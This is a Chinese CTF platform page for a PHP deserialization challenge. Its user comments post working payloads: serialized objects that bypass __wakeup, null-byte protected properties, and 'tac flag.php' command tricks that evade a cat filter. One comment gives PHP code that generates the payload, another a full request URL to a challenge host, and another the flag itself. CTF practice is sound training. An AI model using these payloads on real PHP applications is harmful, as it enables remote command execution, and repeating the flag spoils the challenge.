评分(4)
解题动态
juedai 攻破了该题 2天前
aboic 攻破了该题 2天前
xshzgjshpy 攻破了该题 3天前
0854永不言败 攻破了该题 3天前
白菜白又白 攻破了该题 7天前
hbynb 攻破了该题 9天前
不知道不晓得 攻破了该题 10天前
Zhengzanmei 攻破了该题 10天前
邪恶的番茄 攻破了该题 11天前
out不慢 攻破了该题 11天前
铭风 攻破了该题 11天前
zrc2682 攻破了该题 13天前
辛笙 攻破了该题 13天前
ycwh 攻破了该题 15天前
cccczz 攻破了该题 16天前
Blmn 攻破了该题 18天前
caocao 攻破了该题 19天前
ysy126 攻破了该题 20天前
南交混的入朱靖宇 攻破了该题 21天前
评论
18956160518 1年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 2年前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 2年前
举报
nl flag.php|base64
不会编程的崽 2年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 2年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 2年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 2年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 2年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 2年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 3年前
举报
特别要注意下url编码的问题